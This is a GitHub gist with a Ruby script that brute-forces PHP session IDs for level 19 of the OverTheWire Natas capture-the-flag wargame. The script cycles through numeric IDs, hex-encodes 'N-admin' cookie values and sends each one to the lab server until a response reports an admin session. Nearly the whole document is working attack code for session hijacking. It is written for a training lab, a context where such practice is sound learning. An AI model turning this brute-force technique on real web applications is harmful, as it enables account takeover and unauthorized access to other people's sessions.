Created
May 19, 2014 02:00
-
-
Save dlanner/3d634f2f9d81fd69e262 to your computer and use it in GitHub Desktop.
Script to brute force session id for Natas CTF Level 19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Script to brute force session id for Natas CTF Level 19 | |
| # http://natas19.natas.labs.overthewire.org/ | |
| require 'net/http' | |
| def find_password | |
| raise ArgumentError, "Password required." unless ENV['NATAS19_PASSWORD'] | |
| body_containing_password = "" | |
| bodies = [] | |
| max_id = 640 | |
| (0..max_id*3/2).each do |i| | |
| uri = URI("http://natas19.natas.labs.overthewire.org/") | |
| query = { | |
| "debug" => true | |
| } | |
| uri.query = URI.encode_www_form( query ) | |
| req = Net::HTTP::Get.new(uri) | |
| req.basic_auth 'natas19', ENV['NATAS19_PASSWORD'] | |
| username = "admin" | |
| cookie_value = "#{i}-#{username}" | |
| # Hex-encode the session cookie | |
| hex_cookie_value = bin_to_hex cookie_value | |
| cookie = "PHPSESSID=#{hex_cookie_value}" | |
| puts "Trying cookie #{cookie} (#{cookie_value})" | |
| req['Cookie'] = cookie | |
| res = Net::HTTP.start(uri.hostname, uri.port) { |http| | |
| http.request(req) | |
| } | |
| bodies << res.body | |
| if res.body.include? "You are an admin." | |
| body_containing_password = res.body | |
| break | |
| end | |
| end | |
| puts bodies | |
| puts body_containing_password | |
| end | |
| # http://anthonylewis.com/2011/02/09/to-hex-and-back-with-ruby/ | |
| def bin_to_hex(s) | |
| s.each_byte.map { |b| b.to_s(16) }.join | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment